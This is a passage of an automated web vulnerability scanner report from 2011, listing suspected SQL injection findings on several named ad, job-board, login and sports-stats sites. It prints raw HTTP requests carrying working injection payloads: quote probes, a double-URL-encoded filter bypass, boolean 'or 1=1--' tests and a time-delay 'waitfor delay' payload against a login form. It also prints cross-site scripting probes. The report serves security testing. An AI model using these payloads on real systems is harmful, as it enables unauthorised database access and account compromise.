a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
1.16. http://googleads.g.doubleclick.net/pagead/ads [u_his parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The u_his parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_his parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4%2527&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:14:37 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 11502
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime
...[SNIP]...
c?c:"http://csi.gstatic.com/csi","?v=3","&s="+(d[f].sn||"pagead")+"&action=",a.name,m.length?"&it="+m.join(","):"","",g,"&rt=",p.join(",")].join("");b=new Image;var r=d[f].c++;d[f].a[r]=b;b.onload=b.onerror=function(){delete d[f].a[r]};b.src=a;b=null;return a}};var l=d[f].load;function o(a,b){var c=parseInt(a,10);if(c>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4%2527%2527&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:14:38 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4486
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
1.17. http://googleads.g.doubleclick.net/pagead/ads [u_java parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The u_java parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_java parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1'&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:15:00 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 11359
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime
...[SNIP]...
c?c:"http://csi.gstatic.com/csi","?v=3","&s="+(d[f].sn||"pagead")+"&action=",a.name,m.length?"&it="+m.join(","):"","",g,"&rt=",p.join(",")].join("");b=new Image;var r=d[f].c++;d[f].a[r]=b;b.onload=b.onerror=function(){delete d[f].a[r]};b.src=a;b=null;return a}};var l=d[f].load;function o(a,b){var c=parseInt(a,10);if(c>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-7198064350205397&format=468x60_as&output=html&h=60&w=468&lmt=1300518217&ad_type=text_image&color_bg=FFFFFF&color_border=E6E6E6&color_link=3399CC&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Ftutmarks.com%2F&dt=1300500217813&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300500217826&frm=0&adk=112993918&ga_vid=1274999380.1300500142&ga_sid=1300500142&ga_hid=1254834753&ga_fc=1&u_tz=-300&u_his=4&u_java=1''&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1324&bih=972&eid=33895298&fu=0&ifi=1&dtd=17&xpc=rhyoBDtJOS&p=http%3A//tutmarks.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 17:15:01 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4434
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
1.18. http://jobs.adoperationsonline.com/a/jbb/find-jobs-json/jbb_widget_list_jobpostsd8b3c  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://jobs.adoperationsonline.com
Path:   /a/jbb/find-jobs-json/jbb_widget_list_jobpostsd8b3c<img%20src=a%20onerror=alert(document.cookie

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 94881202'%20or%201%3d1--%20 and 94881202'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a/jbb/find-jobs-json/jbb_widget_list_jobpostsd8b3c<img%20src=a%20onerror=alert(document.cookie HTTP/1.1
Host: jobs.adoperationsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=94881202'%20or%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Mar 2011 15:40:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: gc=1; expires=Sat, 19-Mar-2011 15:40:22 GMT; path=/
Set-Cookie: shabts=none; expires=Tue, 17-May-2011 15:40:22 GMT; path=/; domain=jobs.adoperationsonline.com
Set-Cookie: shut=deleted; expires=Thu, 18-Mar-2010 15:40:21 GMT; path=/
Set-Cookie: shmk=deleted; expires=Thu, 18-Mar-2010 15:40:21 GMT; path=/
Set-Cookie: shup=fvt%3D4d837ce6%26ncs%3D1%26lst%3D4d837ce6; expires=Sun, 17-Apr-2011 15:40:22 GMT; path=/
Cache-Control: no-cache, must-revalidate
Content-Length: 4295

jbb_widget_list_jobpostsd8b3c<img src=a onerror=alert(document.cookie({"version":"0.9","title":"Ad Operations and Online Media Jobs","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/find-jobs","description":"The latest jobs from jobs.adoperationsonline.com","language":"en-us","copyright":"Copyright 2007, Jobamatic","ttl":"60","price":"49","duration":30,"domain_name":"jobs.adoperationsonline.com","jobposts":[{"title":"Senior Director of Ad Operations","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/job-details\/463369","company":"Relona","location":"New York, NY","pubDate":"Sun, 13 Mar 2011 21:52:11 -0700"},{"title":"Campaign Coordinator, Ad Operations","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/job-details\/462363","company":"Flixster","location":"San Francisco, CA","pubDate":"Thu, 10 Mar 2011 15:51:28 -0800"},{"title":"Advertising Operations Analyst","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/job-details\/462328","company":"Conde Nast","location":"New York, NY","pubDate":"Thu, 10 Mar 2011 13:39:55 -0800"},{"title":"Advertising Operations Manager","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/job-details\/462326","company":"Conde Nast","location":"New York, NY","pubDate":"Thu, 10 Mar 2011 13:39:55 -0800"},{"title":"Sr. Account Executive-Advertising","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/job-details\/458649","company":"Bluecava","location":"New York, NY","pubDate":"Thu, 3 Mar 2011 12:55:47 -0800"}],"backfill_jobs":[{"title":"O
...[SNIP]...

Request 2

GET /a/jbb/find-jobs-json/jbb_widget_list_jobpostsd8b3c<img%20src=a%20onerror=alert(document.cookie HTTP/1.1
Host: jobs.adoperationsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=94881202'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Mar 2011 15:40:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: gc=1; expires=Sat, 19-Mar-2011 15:40:22 GMT; path=/
Set-Cookie: shut=deleted; expires=Thu, 18-Mar-2010 15:40:21 GMT; path=/
Set-Cookie: shmk=deleted; expires=Thu, 18-Mar-2010 15:40:21 GMT; path=/
Set-Cookie: shup=fvt%3D4d837ce6%26ncs%3D1%26lst%3D4d837ce6; expires=Sun, 17-Apr-2011 15:40:22 GMT; path=/
Cache-Control: no-cache, must-revalidate
Content-Length: 4295

jbb_widget_list_jobpostsd8b3c<img src=a onerror=alert(document.cookie({"version":"0.9","title":"Ad Operations and Online Media Jobs","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/find-jobs","description":"The latest jobs from jobs.adoperationsonline.com","language":"en-us","copyright":"Copyright 2007, Jobamatic","ttl":"60","price":"49","duration":30,"domain_name":"jobs.adoperationsonline.com","jobposts":[{"title":"Senior Director of Ad Operations","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/job-details\/463369","company":"Relona","location":"New York, NY","pubDate":"Sun, 13 Mar 2011 21:52:11 -0700"},{"title":"Campaign Coordinator, Ad Operations","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/job-details\/462363","company":"Flixster","location":"San Francisco, CA","pubDate":"Thu, 10 Mar 2011 15:51:28 -0800"},{"title":"Advertising Operations Analyst","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/job-details\/462328","company":"Conde Nast","location":"New York, NY","pubDate":"Thu, 10 Mar 2011 13:39:55 -0800"},{"title":"Advertising Operations Manager","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/job-details\/462326","company":"Conde Nast","location":"New York, NY","pubDate":"Thu, 10 Mar 2011 13:39:55 -0800"},{"title":"Sr. Account Executive-Advertising","link":"http:\/\/jobs.adoperationsonline.com\/a\/jbb\/job-details\/458649","company":"Bluecava","location":"New York, NY","pubDate":"Thu, 3 Mar 2011 12:55:47 -0800"}],"backfill_jobs":[{"title":"Online Advertising, Sem, And Social Media Marketing Manager","link":"http:\/\/jobs.adoperationsonline.com\/a\
...[SNIP]...
1.19. http://login1.vindicosuite.com/vindico_dynamic.asp [password parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login1.vindicosuite.com
Path:   /vindico_dynamic.asp

Issue detail

The password parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the password parameter. The application took 21045 milliseconds to respond to the request, compared with 1043 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

POST /vindico_dynamic.asp HTTP/1.1
Host: login1.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://login1.vindicosuite.com/default.asp?message=Invalid%20Username%20and%20or%20Password
Content-Length: 19
Cache-Control: max-age=0
Origin: http://login1.vindicosuite.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725; ASPSESSIONIDQSCTCRCD=JJLIAGCCIOANALFDFGDFNGCO

username=&password='waitfor%20delay'0%3a0%3a20'--

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2294
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 25 Mar 2011 15:58:19 GMT


<html>

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
   <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
   
   <link rel="stylesheet" type="text/css" hre
...[SNIP]...
1.20. http://login1.vindicosuite.com/vindico_dynamic.asp [username parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login1.vindicosuite.com
Path:   /vindico_dynamic.asp

Issue detail

The username parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the username parameter. The application took 21010 milliseconds to respond to the request, compared with 1043 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

POST /vindico_dynamic.asp HTTP/1.1
Host: login1.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://login1.vindicosuite.com/default.asp?message=Invalid%20Username%20and%20or%20Password
Content-Length: 19
Cache-Control: max-age=0
Origin: http://login1.vindicosuite.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725; ASPSESSIONIDQSCTCRCD=JJLIAGCCIOANALFDFGDFNGCO

username='waitfor%20delay'0%3a0%3a20'--&password=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 212
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 25 Mar 2011 15:56:31 GMT

<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Procedure or function 'VINDICO_Authenticate' expects parameter '@password', which was not sup
...[SNIP]...
1.21. http://nydailynews.stats.com/fb/scoreboard.asp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://nydailynews.stats.com
Path:   /fb/scoreboard.asp

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 78970613'%20or%201%3d1--%20 and 78970613'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /fb78970613'%20or%201%3d1--%20/scoreboard.asp?bf8b1%22%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: nydailynews.stats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 5321
Vary: Accept-Encoding
Cache-Control: private, max-age=10
Date: Fri, 18 Mar 2011 15:43:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IIS 7.0 Detailed Error - 404.0 - Not Found</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;background:#CBE1EF;}
code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;}
.config_source code{font-size:.8em;color:#000000;}
pre{margin:0;font-size:1.4em;word-wrap:break-word;}
ul,ol{margin:10px 0 10px 40px;}
ul.first,ol.first{margin-top:5px;}
fieldset{padding:0 15px 10px 15px;}
.summary-container fieldset{padding-bottom:5px;margin-top:4px;}
legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;}
legend{color:#333333;padding:4px 15px 4px 10px;margin:4px 0 8px -12px;_margin-top:0px;
border-top:1px solid #EDEDED;border-left:1px solid #EDEDED;border-right:1px solid #969696;
border-bottom:1px solid #969696;background:#E7ECF0;font-weight:bold;font-size:1em;}
a:link,a:visited{color:#007EFF;font-weight:bold;}
a:hover{text-decoration:none;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;}
h4{font-size:1.2em;margin:10px 0 5px 0;
}#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif;
color:#FFF;background-color:#5C87B2;
}#content{margin:0 0 0 2%;position:relative;}
.summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
.config_source{background:#fff5c4;}
.content-container p{margin:0 0 10px 0;
}#details-left{width:35%;float:left;margin-right:2%;
}#details-right{width:63%;float:left;
}#server_version{width:96%;_height:1px;min-height:1px;margin:0 0 5px 0;padding:11px 2% 8px 2%;color:#FFFFFF;
background-color:#5A7FA5;border-bottom:1px solid #C1CFDD;border-top:1px solid #4A6C8E;font-weight:normal;
font-size:1em;color:#FFF;text-align:right;
}#ser
...[SNIP]...

Request 2

GET /fb78970613'%20or%201%3d2--%20/scoreboard.asp?bf8b1%22%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: nydailynews.stats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Fri, 18 Mar 2011 15:43:14 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>
1.22. http://nydailynews.stats.com/fb/scoreboard.asp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://nydailynews.stats.com
Path:   /fb/scoreboard.asp

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /fb/scoreboard.asp'%20and%201%3d1--%20?bf8b1%22%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: nydailynews.stats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Fri, 18 Mar 2011 15:43:18 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /fb/scoreboard.asp'%20and%201%3d2--%20?bf8b1%22%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: nydailynews.stats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 5276
Vary: Accept-Encoding
Cache-Control: private, max-age=3581
Date: Fri, 18 Mar 2011 15:43:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IIS 7.0 Detailed Error - 404.0 - Not Found</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;background:#CBE1EF;}
code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;}
.config_source code{font-size:.8em;color:#000000;}
pre{margin:0;font-size:1.4em;word-wrap:break-word;}
ul,ol{margin:10px 0 10px 40px;}
ul.first,ol.first{margin-top:5px;}
